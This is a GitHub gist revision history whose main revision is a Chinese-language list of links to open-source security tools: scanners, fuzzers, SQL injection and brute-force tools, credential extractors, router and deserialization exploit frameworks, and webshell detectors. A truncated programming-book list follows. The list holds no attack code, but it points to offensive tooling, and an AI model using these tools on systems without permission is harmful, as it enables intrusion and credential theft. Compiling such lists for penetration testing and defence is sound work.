
Revisions

  1. @ckeyer ckeyer revised this gist Apr 26, 2018. 1 changed file with 208 additions and 189 deletions.
    397 changes: 208 additions & 189 deletions 开源扫描仪的工具箱.md
    @@ -1,189 +1,208 @@
    入门指南

    https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 中文版
    https://wizardforcel.gitbooks.io/asani/content/ 浅入浅出Android安全 中文版
    https://wizardforcel.gitbooks.io/lpad/content/ Android 渗透测试学习手册 中文版
    https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web渗透测试秘籍 中文版
    https://github.com/hardenedlinux/linux-exploit-development-tutorial Linux exploit 开发入门
    https://www.gitbook.com/book/t0data/burpsuite/details burpsuite实战指南
    http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 渗透测试Node.js应用
    https://github.com/qazbnm456/awesome-web-security Web安全资料和资源列表
    https://sec-wiki.com/ sec-wiki安全维基百科
    fuzz工具收集

    https://github.com/ivanfratric/winafl
    https://github.com/attekett/NodeFuzz
    https://github.com/google/oss-fuzz
    http://blog.topsec.com.cn/ad_lab/alphafuzzer/
    http://llvm.org/docs/LibFuzzer.html
    子域名枚举

    https://github.com/lijiejie/subDomainsBrute (经典的子域名爆破枚举脚本)
    https://github.com/ring04h/wydomain (子域名字典穷举)
    https://github.com/le4f/dnsmaper (子域名枚举与地图标记)
    https://github.com/0xbug/orangescan (在线子域名信息收集工具)
    https://github.com/TheRook/subbrute (根据DNS记录查询子域名)
    https://github.com/We5ter/GSDF (基于谷歌SSL透明证书的子域名查询脚本)
    https://github.com/mandatoryprogrammer/cloudflare_enum (使用CloudFlare进行子域名枚举的脚本)
    https://github.com/18F/domain-scan (A domain scanner)
    https://github.com/guelfoweb/knock (Knock Subdomain Scan)
    https://github.com/Evi1CLAY/CoolPool/tree/master/Python/DomainSeeker (多方式收集目标子域名信息)
    https://github.com/code-scan/BroDomain (兄弟域名查询)
    https://github.com/chuhades/dnsbrute (基于dns查询的子域名枚举)
    web应用扫描器

    http://github.com/Arachni/arachni (web应用安全扫描器框架 http://www.arachni-scanner.com)
    数据库扫描、注入工具

    https://github.com/sqlmapproject/sqlmap (注入工具之王sqlmap)
    https://github.com/0xbug/SQLiScanner (一款基于SQLMAP和Charles的被动SQL注入漏洞扫描工具)
    https://github.com/stamparm/DSSS (99行代码实现的sql注入漏洞扫描器)
    https://github.com/youngyangyang04/NoSQLAttack (一款针对mongoDB的攻击工具)
    https://github.com/Neohapsis/bbqsql (SQL盲注利用框架)
    https://github.com/NetSPI/PowerUpSQL (攻击SQLSERVER的Powershell脚本框架)
    https://github.com/WhitewidowScanner/whitewidow (又一款数据库扫描器)
    https://github.com/stampery/mongoaudit (MongoDB审计及渗透工具)
    https://github.com/commixproject/commix (注入点命令执行利用工具)
    弱口令或信息泄漏扫描

    https://github.com/lijiejie/htpwdScan (一个简单的HTTP暴力破解、撞库攻击脚本)
    https://github.com/lijiejie/BBScan (一个迷你的信息泄漏批量扫描脚本)
    https://github.com/lijiejie/GitHack (.git文件夹泄漏利用工具)
    https://github.com/LoRexxar/BScanner (基于字典的目录扫描小工具)
    https://github.com/she11c0der/fenghuangscanner_v3 (各种端口及弱口令检测,作者wilson9x1,原地址失效)
    https://github.com/ysrc/F-Scrack (对各类服务进行弱口令检测的脚本)
    https://github.com/Mebus/cupp (根据用户习惯生成弱口令探测字典脚本)
    https://github.com/RicterZ/genpAss (中国特色的弱口令生成器)
    https://github.com/netxfly/crack_ssh (go写的协程版的ssh\redis\mongodb弱口令破解工具)
    https://github.com/n0tr00t/Sreg (通过输入email、phone、username的返回用户注册的所有互联网护照信息)
    https://github.com/repoog/GitPrey (GitHub敏感信息扫描工具)
    https://github.com/dxa4481/truffleHog (GitHub敏感信息扫描工具,包括检测commit等)
    https://github.com/LandGrey/pydictor (暴力破解字典建立工具)
    https://github.com/GDSSecurity/xxe-recursive-download (xxe漏洞递归下载工具)
    https://buer.haus/xxegen/ (xxe在线生成利用工具)
    物联网设备扫描

    https://github.com/rapid7/IoTSeeker (物联网设备默认密码扫描检测工具)
    https://github.com/shodan-labs/iotdb (使用nmap扫描IoT设备)
    https://github.com/jh00nbr/Routerhunter-2.0 (路由器漏洞扫描利用)
    https://github.com/reverse-shell/routersploit (路由器漏洞利用框架)
    https://github.com/scu-igroup/telnet-scanner (telnet服务密码撞库)
    https://github.com/RUB-NDS/PRET (打印机攻击框架)
    XSS扫描

    https://github.com/shawarkhanethicalhacker/BruteXSS (Cross-Site Scripting Bruteforcer)
    https://github.com/1N3/XSSTracer (A small python script to check for Cross-Site Tracing)
    https://github.com/0x584A/fuzzXssPHP (PHP版本的反射型xss扫描)
    https://github.com/chuhades/xss_scan (批量扫描xss的python脚本)
    https://github.com/BlackHole1/autoFindXssAndCsrf (自动化检测页面是否存在XSS和CSRF漏洞的浏览器插件)
    企业网络自检

    https://github.com/sowish/LNScan (详细的内部网络信息扫描器)
    https://github.com/SkyLined/LocalNetworkScanner (javascript实现的本地网络扫描器)
    https://github.com/ysrc/xunfeng (网络资产识别引擎,漏洞检测引擎)
    https://github.com/laramies/theHarvester (企业被搜索引擎收录敏感资产信息监控脚本:员工邮箱、子域名、Hosts)
    https://github.com/x0day/Multisearch-v2 (搜索引擎聚合搜索,可用于发现企业被搜索引擎收录的敏感资产信息)
    webshell检测以及病毒分析工具

    https://github.com/We5ter/Scanners-Box/tree/master/webshell/ (简单的php后门检测工具以及webshell样本库)
    https://github.com/ym2011/ScanBackdoor (Webshell扫描工具)
    https://github.com/yassineaddi/BackdoorMan (PHP后门扫描)
    https://github.com/he1m4n6a/findWebshell (又一款webshell检测工具)
    https://github.com/Tencent/HaboMalHunter (哈勃分析系统,linux系统病毒分析及安全检测)
    https://github.com/PlagueScanner/PlagueScanner (使用python实现的集成ClamAV、ESET、Bitdefender的反病毒引擎)
    https://github.com/nbs-system/php-malware-finder (一款高效率PHP-webshell扫描工具)
    https://github.com/emposha/PHP-Shell-Detector/ (测试效率高达99%的webshell检测工具)
    内网安全渗透测试工具集

    https://github.com/0xwindows/VulScritp (企业内网渗透脚本,包括banner扫描、端口扫描;各种通用漏洞利用等)
    https://github.com/lcatro/network_backdoor_scanner (基于网络流量的内网探测框架)
    https://github.com/fdiskyou/hunter (调用 Windows API 枚举用户登录信息)
    https://github.com/BlackHole1/WebRtcXSS (自动化利用XSS入侵内网)
    https://github.com/AlessandroZ/LaZagne (本机密码查看提取工具)
    https://github.com/huntergregal/mimipenguin (linux密码抓取神器)
    端口扫描、指纹识别以及中间件扫描

    https://nmap.org/download.html (Nmap端口扫描器之王,https://svn.nmap.org/)
    https://github.com/ring04h/wyportmap (目标端口扫描+系统服务指纹识别)
    https://github.com/ring04h/weakfilescan (动态多线程敏感信息泄露检测工具)
    https://github.com/EnableSecurity/wafw00f (WAF产品指纹识别)
    https://github.com/rbsec/sslscan (ssl类型识别)
    https://github.com/urbanadventurer/whatweb (web指纹识别)
    https://github.com/tanjiti/FingerPrint (web应用指纹识别)
    https://github.com/nanshihui/Scan-T (网络爬虫式指纹识别)
    https://github.com/OffensivePython/Nscan (a fast Network scanner inspired by Masscan and Zmap)
    https://github.com/ywolf/F-NAScan (网络资产信息扫描, ICMP存活探测,端口扫描,端口指纹服务识别)
    https://github.com/ywolf/F-MiddlewareScan (中间件扫描)
    https://github.com/maurosoria/dirsearch (Web path scanner)
    https://github.com/x0day/bannerscan (C段Banner与路径扫描)
    https://github.com/RASSec/RASscan (端口服务扫描)
    https://github.com/3xp10it/bypass_waf (waf自动暴破)
    https://github.com/3xp10it/xcdn (尝试找出cdn背后的真实ip)
    https://github.com/Xyntax/BingC (基于Bing搜索引擎的C段/旁站查询,多线程,支持API)
    https://github.com/Xyntax/DirBrute (多线程WEB目录爆破工具)
    https://github.com/zer0h/httpscan (一个爬虫式的网段Web主机发现小工具)
    https://github.com/lietdai/doom (thorn上实现的分布式任务分发的ip端口漏洞扫描器)
    https://github.com/chichou/grab.js (类似 zgrab 的快速 TCP 指纹抓取解析工具,支持更多协议)
    https://github.com/Nitr4x/whichCDN (CDN识别、检测)
    https://github.com/secfree/bcrpscan (基于爬虫的web路径扫描器)
    针对性漏洞测试工具

    https://github.com/brianwrf/hackUtils (java反序列化利用工具集)
    https://github.com/frohoff/ysoserial ( java反序列化利用工具)
    https://github.com/blackye/Jenkins (Jenkins漏洞探测、用户抓取爆破)
    https://github.com/code-scan/dzscan (discuz漏洞扫描)
    https://github.com/chuhades/CMS-Exploit-Framework (CMS攻击框架)
    https://github.com/lijiejie/IIS_shortname_Scanner (IIS短文件名漏洞扫描)
    https://github.com/riusksk/FlashScanner (flashxss扫描)
    https://github.com/coffeehb/SSTIF (服务器端模板注入漏洞的半自动化工具)
    https://github.com/epinna/tplmap (服务器端模板注入漏洞检测与利用工具)
    https://github.com/cr0hn/dockerscan (docker扫描工具)
    https://github.com/GoSecure/break-fast-serial (借助DNS解析来检测Java反序列化漏洞工具)
    https://github.com/dirtycow/dirtycow.github.io (脏牛提权漏洞exp)
    无线网络渗透、扫描

    https://github.com/savio-code/fern-wifi-cracker/ (无线安全审计工具)
    https://github.com/m4n3dw0lf/PytheM (Python网络/渗透测试工具)
    https://github.com/P0cL4bs/WiFi-Pumpkin (无线安全渗透测试套件)
    代码静态扫描、代码运行栈跟踪

    https://github.com/exakat/php-static-analysis-tools (php静态扫描工具集)
    https://github.com/wufeifei/cobra (白盒代码安全审计系统)
    https://github.com/OneSourceCat/phpvulhunter (静态php代码审计)
    https://github.com/Qihoo360/phptrace (跟踪、分析PHP运行情况的工具)
    https://github.com/ajinabraham/NodeJsScan (NodeJS应用代码审计)
    https://github.com/pwnsdx/BadCode (PHP代码审计)
    https://github.com/thesp0nge/dawnscanner (ruby源码审计)
    https://github.com/presidentbeef/brakeman (Ruby on Rails应用程序的安全漏洞)
    https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/ (app黑盒审计)
    https://github.com/alibaba/iOSSecAudit (iOS安全审计)
    模块化扫描、综合扫描器

    https://github.com/az0ne/AZScanner (自动漏洞扫描器,子域名爆破,端口扫描,目录爆破,常用框架漏洞检测)
    https://github.com/blackye/lalascan (分布式web漏洞扫描框架,集合owasp top10漏洞扫描和边界资产发现能力)
    https://github.com/blackye/BkScanner (BkScanner 分布式、插件化web漏洞扫描器)
    https://github.com/ysrc/GourdScanV2 (被动式漏洞扫描)
    https://github.com/alpha1e0/pentestdb (WEB渗透测试数据库)
    https://github.com/netxfly/passive_scan (基于http代理的web漏洞扫描器)
    https://github.com/1N3/Sn1per (自动化扫描器,包括中间件扫描以及设备指纹识别)
    https://github.com/RASSec/pentestEr_Fully-automatic-scanner (定向全自动化渗透测试工具)
    https://github.com/3xp10it/3xp10it (自动化渗透测试框架)
    https://github.com/Lcys/lcyscan (扫描效果未验证)
    https://github.com/Xyntax/POC-T (渗透测试插件化并发框架)
    https://github.com/v3n0m-Scanner/V3n0M-Scanner (Scanner in Python3.5 for SQLi/XSS/LFI/RFI and other Vulns)
    https://github.com/Skycrab/leakScan (web端的在线漏洞扫描)
    https://github.com/zhangzhenfeng/AnyScan (开发中…)
    Android系列工具:

    http://sec-redclub.com/index.php/archives/439/
    DDOS防护:

    https://github.com/ywjt/Dshield
    Database firewall:

    https://nim4.github.io/DBShield/
    waf开源及规则:

    https://github.com/xsec-lab/x-waf
    https://github.com/loveshell/ngx_lua_waf
    https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/base_rules
    ### 入门指南

    * https://wizardforcel.gitbooks.io/web-hacking-101/content/ Web Hacking 101 中文版
    * https://wizardforcel.gitbooks.io/asani/content/ 浅入浅出Android安全 中文版
    * https://wizardforcel.gitbooks.io/lpad/content/ Android 渗透测试学习手册 中文版
    * https://wizardforcel.gitbooks.io/kali-linux-web-pentest-cookbook/content/ Kali Linux Web渗透测试秘籍 中文版
    * https://github.com/hardenedlinux/linux-exploit-development-tutorial Linux exploit 开发入门
    * https://www.gitbook.com/book/t0data/burpsuite/details burpsuite实战指南
    * http://www.kanxue.com/?article-read-1108.htm=&winzoom=1 渗透测试Node.js应用
    * https://github.com/qazbnm456/awesome-web-security Web安全资料和资源列表
    * https://sec-wiki.com/ sec-wiki安全维基百科

    ### fuzz工具收集

    * https://github.com/ivanfratric/winafl
    * https://github.com/attekett/NodeFuzz
    * https://github.com/google/oss-fuzz
    * http://blog.topsec.com.cn/ad_lab/alphafuzzer/
    * http://llvm.org/docs/LibFuzzer.html

    ### 子域名枚举

    * https://github.com/lijiejie/subDomainsBrute (经典的子域名爆破枚举脚本)
    * https://github.com/ring04h/wydomain (子域名字典穷举)
    * https://github.com/le4f/dnsmaper (子域名枚举与地图标记)
    * https://github.com/0xbug/orangescan (在线子域名信息收集工具)
    * https://github.com/TheRook/subbrute (根据DNS记录查询子域名)
    * https://github.com/We5ter/GSDF (基于谷歌SSL透明证书的子域名查询脚本)
    * https://github.com/mandatoryprogrammer/cloudflare_enum (使用CloudFlare进行子域名枚举的脚本)
    * https://github.com/18F/domain-scan (A domain scanner)
    * https://github.com/guelfoweb/knock (Knock Subdomain Scan)
    * https://github.com/Evi1CLAY/CoolPool/tree/master/Python/DomainSeeker (多方式收集目标子域名信息)
    * https://github.com/code-scan/BroDomain (兄弟域名查询)
    * https://github.com/chuhades/dnsbrute (基于dns查询的子域名枚举)

    ### web应用扫描器

    * http://github.com/Arachni/arachni (web应用安全扫描器框架 http://www.arachni-scanner.com)

    ### 数据库扫描、注入工具

    * https://github.com/sqlmapproject/sqlmap (注入工具之王sqlmap)
    * https://github.com/0xbug/SQLiScanner (一款基于SQLMAP和Charles的被动SQL注入漏洞扫描工具)
    * https://github.com/stamparm/DSSS (99行代码实现的sql注入漏洞扫描器)
    * https://github.com/youngyangyang04/NoSQLAttack (一款针对mongoDB的攻击工具)
    * https://github.com/Neohapsis/bbqsql (SQL盲注利用框架)
    * https://github.com/NetSPI/PowerUpSQL (攻击SQLSERVER的Powershell脚本框架)
    * https://github.com/WhitewidowScanner/whitewidow (又一款数据库扫描器)
    * https://github.com/stampery/mongoaudit (MongoDB审计及渗透工具)
    * https://github.com/commixproject/commix (注入点命令执行利用工具)

    ### 弱口令或信息泄漏扫描

    * https://github.com/lijiejie/htpwdScan (一个简单的HTTP暴力破解、撞库攻击脚本)
    * https://github.com/lijiejie/BBScan (一个迷你的信息泄漏批量扫描脚本)
    * https://github.com/lijiejie/GitHack (.git文件夹泄漏利用工具)
    * https://github.com/LoRexxar/BScanner (基于字典的目录扫描小工具)
    * https://github.com/she11c0der/fenghuangscanner_v3 (各种端口及弱口令检测,作者wilson9x1,原地址失效)
    * https://github.com/ysrc/F-Scrack (对各类服务进行弱口令检测的脚本)
    * https://github.com/Mebus/cupp (根据用户习惯生成弱口令探测字典脚本)
    * https://github.com/RicterZ/genpAss (中国特色的弱口令生成器)
    * https://github.com/netxfly/crack_ssh (go写的协程版的ssh\redis\mongodb弱口令破解工具)
    * https://github.com/n0tr00t/Sreg (通过输入email、phone、username的返回用户注册的所有互联网护照信息)
    * https://github.com/repoog/GitPrey (GitHub敏感信息扫描工具)
    * https://github.com/dxa4481/truffleHog (GitHub敏感信息扫描工具,包括检测commit等)
    * https://github.com/LandGrey/pydictor (暴力破解字典建立工具)
    * https://github.com/GDSSecurity/xxe-recursive-download (xxe漏洞递归下载工具)
    * https://buer.haus/xxegen/ (xxe在线生成利用工具)

    ### 物联网设备扫描

    * https://github.com/rapid7/IoTSeeker (物联网设备默认密码扫描检测工具)
    * https://github.com/shodan-labs/iotdb (使用nmap扫描IoT设备)
    * https://github.com/jh00nbr/Routerhunter-2.0 (路由器漏洞扫描利用)
    * https://github.com/reverse-shell/routersploit (路由器漏洞利用框架)
    * https://github.com/scu-igroup/telnet-scanner (telnet服务密码撞库)
    * https://github.com/RUB-NDS/PRET (打印机攻击框架)

    ### XSS扫描

    * https://github.com/shawarkhanethicalhacker/BruteXSS (Cross-Site Scripting Bruteforcer)
    * https://github.com/1N3/XSSTracer (A small python script to check for Cross-Site Tracing)
    * https://github.com/0x584A/fuzzXssPHP (PHP版本的反射型xss扫描)
    * https://github.com/chuhades/xss_scan (批量扫描xss的python脚本)
    * https://github.com/BlackHole1/autoFindXssAndCsrf (自动化检测页面是否存在XSS和CSRF漏洞的浏览器插件)

    ### 企业网络自检

    * https://github.com/sowish/LNScan (详细的内部网络信息扫描器)
    * https://github.com/SkyLined/LocalNetworkScanner (javascript实现的本地网络扫描器)
    * https://github.com/ysrc/xunfeng (网络资产识别引擎,漏洞检测引擎)
    * https://github.com/laramies/theHarvester (企业被搜索引擎收录敏感资产信息监控脚本:员工邮箱、子域名、Hosts)
    * https://github.com/x0day/Multisearch-v2 (搜索引擎聚合搜索,可用于发现企业被搜索引擎收录的敏感资产信息)

    ### webshell检测以及病毒分析工具

    * https://github.com/We5ter/Scanners-Box/tree/master/webshell/ (简单的php后门检测工具以及webshell样本库)
    * https://github.com/ym2011/ScanBackdoor (Webshell扫描工具)
    * https://github.com/yassineaddi/BackdoorMan (PHP后门扫描)
    * https://github.com/he1m4n6a/findWebshell (又一款webshell检测工具)
    * https://github.com/Tencent/HaboMalHunter (哈勃分析系统,linux系统病毒分析及安全检测)
    * https://github.com/PlagueScanner/PlagueScanner (使用python实现的集成ClamAV、ESET、Bitdefender的反病毒引擎)
    * https://github.com/nbs-system/php-malware-finder (一款高效率PHP-webshell扫描工具)
    * https://github.com/emposha/PHP-Shell-Detector/ (测试效率高达99%的webshell检测工具)

    ### 内网安全渗透测试工具集

    * https://github.com/0xwindows/VulScritp (企业内网渗透脚本,包括banner扫描、端口扫描;各种通用漏洞利用等)
    * https://github.com/lcatro/network_backdoor_scanner (基于网络流量的内网探测框架)
    * https://github.com/fdiskyou/hunter (调用 Windows API 枚举用户登录信息)
    * https://github.com/BlackHole1/WebRtcXSS (自动化利用XSS入侵内网)
    * https://github.com/AlessandroZ/LaZagne (本机密码查看提取工具)
    * https://github.com/huntergregal/mimipenguin (linux密码抓取神器)

    ### 端口扫描、指纹识别以及中间件扫描

    * https://nmap.org/download.html (Nmap端口扫描器之王,https://svn.nmap.org/)
    * https://github.com/ring04h/wyportmap (目标端口扫描+系统服务指纹识别)
    * https://github.com/ring04h/weakfilescan (动态多线程敏感信息泄露检测工具)
    * https://github.com/EnableSecurity/wafw00f (WAF产品指纹识别)
    * https://github.com/rbsec/sslscan (ssl类型识别)
    * https://github.com/urbanadventurer/whatweb (web指纹识别)
    * https://github.com/tanjiti/FingerPrint (web应用指纹识别)
    * https://github.com/nanshihui/Scan-T (网络爬虫式指纹识别)
    * https://github.com/OffensivePython/Nscan (a fast Network scanner inspired by Masscan and Zmap)
    * https://github.com/ywolf/F-NAScan (网络资产信息扫描, ICMP存活探测,端口扫描,端口指纹服务识别)
    * https://github.com/ywolf/F-MiddlewareScan (中间件扫描)
    * https://github.com/maurosoria/dirsearch (Web path scanner)
    * https://github.com/x0day/bannerscan (C段Banner与路径扫描)
    * https://github.com/RASSec/RASscan (端口服务扫描)
    * https://github.com/3xp10it/bypass_waf (waf自动暴破)
    * https://github.com/3xp10it/xcdn (尝试找出cdn背后的真实ip)
    * https://github.com/Xyntax/BingC (基于Bing搜索引擎的C段/旁站查询,多线程,支持API)
    * https://github.com/Xyntax/DirBrute (多线程WEB目录爆破工具)
    * https://github.com/zer0h/httpscan (一个爬虫式的网段Web主机发现小工具)
    * https://github.com/lietdai/doom (thorn上实现的分布式任务分发的ip端口漏洞扫描器)
    * https://github.com/chichou/grab.js (类似 zgrab 的快速 TCP 指纹抓取解析工具,支持更多协议)
    * https://github.com/Nitr4x/whichCDN (CDN识别、检测)
    * https://github.com/secfree/bcrpscan (基于爬虫的web路径扫描器)

    ### 针对性漏洞测试工具

    * https://github.com/brianwrf/hackUtils (java反序列化利用工具集)
    * https://github.com/frohoff/ysoserial ( java反序列化利用工具)
    * https://github.com/blackye/Jenkins (Jenkins漏洞探测、用户抓取爆破)
    * https://github.com/code-scan/dzscan (discuz漏洞扫描)
    * https://github.com/chuhades/CMS-Exploit-Framework (CMS攻击框架)
    * https://github.com/lijiejie/IIS_shortname_Scanner (IIS短文件名漏洞扫描)
    * https://github.com/riusksk/FlashScanner (flashxss扫描)
    * https://github.com/coffeehb/SSTIF (服务器端模板注入漏洞的半自动化工具)
    * https://github.com/epinna/tplmap (服务器端模板注入漏洞检测与利用工具)
    * https://github.com/cr0hn/dockerscan (docker扫描工具)
    * https://github.com/GoSecure/break-fast-serial (借助DNS解析来检测Java反序列化漏洞工具)
    * https://github.com/dirtycow/dirtycow.github.io (脏牛提权漏洞exp)

    ### 无线网络渗透、扫描

    * https://github.com/savio-code/fern-wifi-cracker/ (无线安全审计工具)
    * https://github.com/m4n3dw0lf/PytheM (Python网络/渗透测试工具)
    * https://github.com/P0cL4bs/WiFi-Pumpkin (无线安全渗透测试套件)

    ### 代码静态扫描、代码运行栈跟踪

    * https://github.com/exakat/php-static-analysis-tools (php静态扫描工具集)
    * https://github.com/wufeifei/cobra (白盒代码安全审计系统)
    * https://github.com/OneSourceCat/phpvulhunter (静态php代码审计)
    * https://github.com/Qihoo360/phptrace (跟踪、分析PHP运行情况的工具)
    * https://github.com/ajinabraham/NodeJsScan (NodeJS应用代码审计)
    * https://github.com/pwnsdx/BadCode (PHP代码审计)
    * https://github.com/thesp0nge/dawnscanner (ruby源码审计)
    * https://github.com/presidentbeef/brakeman (Ruby on Rails应用程序的安全漏洞)
    * https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/ (app黑盒审计)
    * https://github.com/alibaba/iOSSecAudit (iOS安全审计)

    ### 模块化扫描、综合扫描器

    * https://github.com/az0ne/AZScanner (自动漏洞扫描器,子域名爆破,端口扫描,目录爆破,常用框架漏洞检测)
    * https://github.com/blackye/lalascan (分布式web漏洞扫描框架,集合owasp top10漏洞扫描和边界资产发现能力)
    * https://github.com/blackye/BkScanner (BkScanner 分布式、插件化web漏洞扫描器)
    * https://github.com/ysrc/GourdScanV2 (被动式漏洞扫描)
    * https://github.com/alpha1e0/pentestdb (WEB渗透测试数据库)
    * https://github.com/netxfly/passive_scan (基于http代理的web漏洞扫描器)
    * https://github.com/1N3/Sn1per (自动化扫描器,包括中间件扫描以及设备指纹识别)
    * https://github.com/RASSec/pentestEr_Fully-automatic-scanner (定向全自动化渗透测试工具)
    * https://github.com/3xp10it/3xp10it (自动化渗透测试框架)
    * https://github.com/Lcys/lcyscan (扫描效果未验证)
    * https://github.com/Xyntax/POC-T (渗透测试插件化并发框架)
    * https://github.com/v3n0m-Scanner/V3n0M-Scanner (Scanner in Python3.5 for SQLi/XSS/LFI/RFI and other Vulns)
    * https://github.com/Skycrab/leakScan (web端的在线漏洞扫描)
    * https://github.com/zhangzhenfeng/AnyScan (开发中…)

    ### Android系列工具:

    * http://sec-redclub.com/index.php/archives/439/

    ### DDOS防护:

    * https://github.com/ywjt/Dshield

    ### Database firewall:

    * https://nim4.github.io/DBShield/

    ### waf开源及规则:

    * https://github.com/xsec-lab/x-waf
    * https://github.com/loveshell/ngx_lua_waf
    * https://github.com/SpiderLabs/owasp-modsecurity-crs/tree/master/base_rules
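Review bot: heading style is inconsistent in the rewritten markdown: the last four headings (`### Android系列工具:`, `### DDOS防护:`, `### Database firewall:`, `### waf开源及规则:`) keep the trailing colon carried over from the plain-text version, while every other `###` heading has none; drop the colons so all headings match. The file also has no top-level `#` title above `### 入门指南`, so the gist renders as a sequence of third-level sections with nothing naming the list; a single `# 开源扫描仪的工具箱` at the top would fix that. Minor: `http://github.com/Arachni/arachni` is the only GitHub link left on plain `http://`; switch it to `https://` like the rest.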
  2. @ckeyer ckeyer revised this gist Apr 17, 2018. 3 changed files with 0 additions and 0 deletions.
  3. @ckeyer ckeyer revised this gist Apr 17, 2018. 1 changed file with 253 additions and 0 deletions.
    253 changes: 253 additions & 0 deletions 经典编程书籍大全
    @@ -0,0 +1,253 @@
    # 经典编程书籍大全

    100+ 经典技术书籍,涵盖:计算机系统与网络、系统架构、算法与数据结构、前端开发、后端开发、移动开发、数据库、测试、项目与团队、程序员职业修炼、求职面试 和 编程相关的经典书籍。

    这个列表综合了伯乐在线网站以往推荐[经典书籍](http://blog.jobbole.com/tag/book/)文章中的列表,以及在微信和微博中被广泛推荐的好书。虽然已经包括了100多本,覆盖的面也比较全。仍然有很多方面需要补充,而且相信还有很多没有被收录的好书。欢迎大家在 issues 中推荐或自荐。

    ## 计算机系统与网络

    * 《[图灵的秘密:他的生平、思想及论文解读](https://www.amazon.cn/gp/product/B00AAQXKXS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00AAQXKXS&linkCode=as2&tag=vastwork-23)》
    * 《[计算机系统概论](https://www.amazon.cn/gp/product/B0011F9OQE/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0011F9OQE&linkCode=as2&tag=vastwork-23)》
    * 《[深入理解Linux内核](https://www.amazon.cn/gp/product/B0011F5RYM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0011F5RYM&linkCode=as2&tag=vastwork-23)》
    * 《[深入Linux内核架构](https://www.amazon.cn/gp/product/B003QN7J7U/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B003QN7J7U&linkCode=as2&tag=vastwork-23)》
    * 《[TCP/IP详解 卷1:协议](https://www.amazon.cn/gp/product/B00116OTVS/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00116OTVS&linkCode=as2&tag=vastwork-23)》
    * 《[Linux系统编程(第2版)](https://www.amazon.cn/gp/product/B00JUM2ML4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00JUM2ML4&linkCode=as2&tag=vastwork-23)》
    * 《[Linux内核设计与实现(第3版)](https://www.amazon.cn/gp/product/B004X3Z3D4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004X3Z3D4&linkCode=as2&tag=vastwork-23)》
    * 《[深入理解计算机系统(原书第2版)](https://www.amazon.cn/gp/product/B004BJ18KM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B004BJ18KM&linkCode=as2&tag=vastwork-23)》
    * 《[计算机程序的构造和解释(原书第2版)](https://www.amazon.cn/gp/product/B0011AP7RY/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0011AP7RY&linkCode=as2&tag=vastwork-23)》
    * 《[编码:隐匿在计算机软硬件背后的语言](https://www.amazon.cn/gp/product/B009RSXIB4/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B009RSXIB4&linkCode=as2&tag=vastwork-23)》
    * 《[性能之颠:洞悉系统、企业与云计算](https://www.amazon.cn/gp/product/B0140I5WPK/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0140I5WPK&linkCode=as2&tag=vastwork-23)》
    * 《[UNIX网络编程 卷1:套接字联网API(第3版)](https://www.amazon.cn/gp/product/B011S72JB6/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B011S72JB6&linkCode=as2&tag=vastwork-23)》
    * 《[UNIX网络编程 卷2:进程间通信](https://www.amazon.cn/gp/product/B012R5A29O/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B012R5A29O&linkCode=as2&tag=vastwork-23)》
    * 《[Windows核心编程(第5版)](https://www.amazon.cn/gp/product/B001GS7918/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B001GS7918&linkCode=as2&tag=vastwork-23)》
    * 《[WireShark网络分析就这么简单](https://www.amazon.cn/gp/product/B00PB5QQ84/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00PB5QQ84&linkCode=as2&tag=vastwork-23)》
    * 《[WireShark网络分析的艺术](https://www.amazon.cn/gp/product/B01AS1OS8A/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B01AS1OS8A&linkCode=as2&tag=vastwork-23)》

    ## 编程通用

    * 《[编程原本](https://www.amazon.cn/gp/product/B006P7V73G/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B006P7V73G&linkCode=as2&tag=vastwork-23)》
    * 《[代码大全](https://www.amazon.cn/gp/product/B0061XKRXA/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0061XKRXA&linkCode=as2&tag=vastwork-23)》
    * 《[UNIX编程艺术](https://www.amazon.cn/gp/product/B008Z1IEQ8/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B008Z1IEQ8&linkCode=as2&tag=vastwork-23)》
    * 《[代码整洁之道](https://www.amazon.cn/gp/product/B0031M9GHC/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0031M9GHC&linkCode=as2&tag=vastwork-23)》
    * 《[编程珠玑(第2版)](https://www.amazon.cn/gp/product/B00SFZH0DC/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B00SFZH0DC&linkCode=as2&tag=vastwork-23)》
    * 《[编程珠玑(续)](https://www.amazon.cn/gp/product/B0150BMQDM/ref=as_li_qf_sp_asin_il_tl?ie=UTF8&camp=536&creative=3200&creativeASIN=B0150BMQDM&linkCode=as2&tag=vastwork-23)》
